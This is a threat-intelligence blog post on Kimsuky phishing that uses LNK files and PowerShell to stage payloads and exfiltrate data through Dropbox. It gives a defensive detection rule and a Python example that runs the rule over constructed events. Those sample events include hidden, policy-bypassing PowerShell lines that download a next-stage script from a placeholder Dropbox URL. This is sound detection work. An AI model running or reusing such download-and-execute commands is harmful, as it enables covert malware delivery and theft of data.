Kimsuky's Monolithic Werewolf: LNK & PowerShell Abusing Dropbox for Stealthy Attacks

By Samarth Desai, 2/19/2025
#DropboxExploitation #CyberThreats #Kimsuky

A recent report on Kimsuky activity (tracked as Monolithic Werewolf) shows that the adversary continues to distribute malicious LNK files and abuse PowerShell, this time with Dropbox built into the attack chain. Despite the multi-stage design of the attack, there is a clear detection opportunity: PowerShell reaching out to the domain "dl.dropboxusercontent.com" to download the next stage.

Kimsuky's attack chain begins with a phishing email carrying a malicious .LNK file. When the shortcut is opened, it runs PowerShell code that fetches and displays a lure document from Dropbox while establishing persistence through a scheduled task. Reconnaissance follows: PowerShell scripts collect system information and upload it to Dropbox. The operators authenticate to Dropbox with OAuth tokens, so exfiltration looks like ordinary API traffic to a trusted service, and they keep persistence through the scheduled tasks. Using a widely trusted platform lets the traffic blend in with normal user behavior and slip past defenses that rely on domain reputation alone.

Detection logic (pseudo-query): the process command line contains 'powershell' AND the network destination (DestinationHostname or DestinationAddress in a network-connection event) contains "dl.dropboxusercontent.com". Legitimate Dropbox sync clients also reach this host, so the PowerShell condition is what makes the rule useful; expect some noise from administrators who pull scripts from Dropbox with PowerShell, and pivot on the parent process (explorer.exe launching PowerShell from a .LNK) and any scheduled-task creation that follows to triage hits.
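The rule above, run over constructed Sysmon-style network-connection events as an added example (this is not code from the original post or from the report it summarizes). The event fields, hostnames other than dl.dropboxusercontent.com, and the Dropbox path in the sample command line are assumptions made up for the example.

```python
"""Added example, not from the original post: apply the page's pseudo-query
   commandline has 'powershell' AND destination has 'dl.dropboxusercontent.com'
to constructed Sysmon Event ID 3 (NetworkConnect)-style records."""
from dataclasses import dataclass
from typing import Iterable, List


@dataclass(frozen=True)
class NetEvent:
    """Subset of fields a network-connection telemetry record carries.
    Sample values below are constructed for this example."""
    image: str          # full path of the connecting process
    command_line: str   # command line of that process
    dest_host: str      # DestinationHostname (or address) of the connection
    dest_port: int
    parent_image: str   # parent process, useful for triage (LNK -> explorer.exe -> powershell)


PROCESS_MARKER = "powershell"
DEST_MARKER = "dl.dropboxusercontent.com"


def matches_rule(ev: NetEvent) -> bool:
    """The page's rule: PowerShell in the command line AND the Dropbox
    content host as destination. Matching is case-insensitive because
    Windows command lines and DNS names are."""
    return (PROCESS_MARKER in ev.command_line.lower()
            and DEST_MARKER in ev.dest_host.lower())


def hunt(events: Iterable[NetEvent]) -> List[NetEvent]:
    """Return every event that trips the rule."""
    return [e for e in events if matches_rule(e)]


def alert_line(ev: NetEvent) -> str:
    """One-line alert that surfaces the parent process for triage."""
    return (f"ALERT parent={ev.parent_image} image={ev.image} "
            f"dest={ev.dest_host}:{ev.dest_port}")


# Constructed sample telemetry (assumed values, not real logs).
SAMPLE_EVENTS = [
    # LNK opened from Explorer spawns hidden PowerShell that pulls the next stage: should alert
    NetEvent(
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line='powershell.exe -w hidden -ep bypass -c "iwr https://dl.dropboxusercontent.com/s/EXAMPLE/stage2.ps1"',
        dest_host="dl.dropboxusercontent.com", dest_port=443,
        parent_image=r"C:\Windows\explorer.exe"),
    # Legitimate Dropbox desktop client syncing: same host, no PowerShell, must not alert
    NetEvent(
        image=r"C:\Program Files (x86)\Dropbox\Client\Dropbox.exe",
        command_line='"C:\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe" /systemstartup',
        dest_host="dl.dropboxusercontent.com", dest_port=443,
        parent_image=r"C:\Windows\explorer.exe"),
    # Admin script reaching an internal host: PowerShell, wrong destination, must not alert
    NetEvent(
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line="powershell.exe -File C:\\ops\\inventory.ps1",
        dest_host="scripts.corp.example", dest_port=443,
        parent_image=r"C:\Windows\System32\svchost.exe"),
    # Same behaviour with mixed case, launched via cmd.exe: should alert
    NetEvent(
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.EXE",
        command_line='PowerShell.EXE -NoP -W Hidden -Enc SQBFAFgA',
        dest_host="DL.DROPBOXUSERCONTENT.COM", dest_port=443,
        parent_image=r"C:\Windows\System32\cmd.exe"),
    # PowerShell 7 (pwsh.exe) to the same host: escapes a literal 'powershell' substring match
    NetEvent(
        image=r"C:\Program Files\PowerShell\7\pwsh.exe",
        command_line='pwsh.exe -c "iwr https://dl.dropboxusercontent.com/s/EXAMPLE/stage2.ps1"',
        dest_host="dl.dropboxusercontent.com", dest_port=443,
        parent_image=r"C:\Windows\explorer.exe"),
]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(alert_line(hit))
```

The last sample event shows the rule's blind spot: as written, the substring 'powershell' does not catch pwsh.exe or a renamed PowerShell binary, so a production version should match on the process image or its OriginalFileName as well as the command line.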
